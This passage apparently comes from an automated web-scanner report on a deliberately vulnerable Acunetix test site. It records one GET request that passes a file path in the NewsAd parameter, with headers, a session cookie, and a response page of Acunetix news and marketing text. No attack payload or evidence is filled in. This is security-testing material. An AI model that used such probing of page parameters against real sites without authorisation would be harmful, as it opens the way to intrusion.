<a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a 